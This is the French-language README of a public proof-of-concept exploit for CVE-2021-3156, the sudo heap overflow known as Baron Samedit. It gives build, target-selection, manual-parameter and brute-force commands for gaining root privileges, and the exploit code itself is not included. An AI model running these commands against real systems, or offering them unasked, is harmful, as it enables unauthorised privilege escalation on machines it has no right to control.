
Exploit de preuve de concept pour CVE-2021-3156, un débordement de tas dans sudo (Baron Samedit). Permet la sélection de cible, le réglage manuel des paramètres, et la détection expérimentale par force brute pour l'escalade de privilèges.
Ceci est un exploit pour la vulnérabilité CVE-2021-3156 dans sudo (surnommée Baron Samedit par Qualys).
build :
$ make
liste des cibles :
$ ./sudo-hax-me-a-sandwich
exécution :
$ ./sudo-hax-me-a-sandwich <target_number>
mode manuel :
$ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
Assurez-vous d'avoir GNU parallel installé.
$ make brute
$ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
quelques exemples à essayer :
$ ./brute.sh 90 120 50 70 150 300
Cela consommera tous les cœurs disponibles. N'essayez pas de faire netflix & brute.
Contribuez au dépôt Envoyez une PR (raisonnable), je peux merger. Laissez une étoile
Quelques idées :